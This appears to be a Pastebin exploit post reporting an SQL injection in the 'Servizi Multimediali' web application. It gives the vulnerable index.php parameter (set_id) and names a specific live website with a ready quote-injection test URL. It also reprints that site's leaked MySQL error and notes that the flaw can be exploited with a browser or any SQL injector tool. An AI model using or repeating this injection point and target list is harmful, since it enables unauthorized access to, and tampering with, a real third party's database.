KingSkrupellos

Servizi Multimediali SQL Injection

Oct 10th, 2019
191
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.47 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Servizi Multimediali SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 11/10/2019
  7. # Vendor Homepage : servizimultimediali.net
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  12. Special Elements used in an SQL Command ('SQL Injection') ]
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  16.  
  17. ###################################################################
  18.  
  19. # Impact :
  20. ***********
  21. Servizi Multimediali is prone to an SQL-injection vulnerability because it fails to
  22. sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue
  23. could allow an attacker to compromise the application, access or modify data, or exploit
  24. latent vulnerabilities in the underlying database. A remote attacker can send a specially
  25. crafted request to the vulnerable application and execute arbitrary SQL commands in
  26. application`s database. Further exploitation of this vulnerability may result in unauthorized
  27. data manipulation. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  28.  
  29. ###################################################################
  30.  
  31. # SQL Injection Exploit :
  32. **********************
  33. /index.php?id=[ID-NUMBER]&lang_id=ita&set_id=[SQL Injection]&record_id=[ID-NUMBER]
  34.  
  35. ###################################################################
  36.  
  37. # Example Vulnerable Sites :
  38. *************************
  39. [+] abitareudine.it/index.php?id=2&lang_id=ita&set_id=1%27&record_id=1
  40.  
  41. ###################################################################
  42.  
  43. # Example SQL Database Error :
  44. ****************************
  45. queryString
  46. SELECT * FROM immobile_ita WHERE id_ref=9 AND id!=1
  47. AND tipologia= AND tipologiacontratto= ORDER BY prezzo, rank LIMIT 18
  48. error
  49. You have an error in your SQL syntax; check the manual that corresponds
  50. to your MySQL server version for the right syntax to use near 'AND
  51. tipologiacontratto= ORDER BY prezzo, rank LIMIT 18' at line 1
  52.  
  53. ###################################################################
  54.  
  55. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  56.  
  57. ###################################################################
Add Comment
Please, Sign In to add comment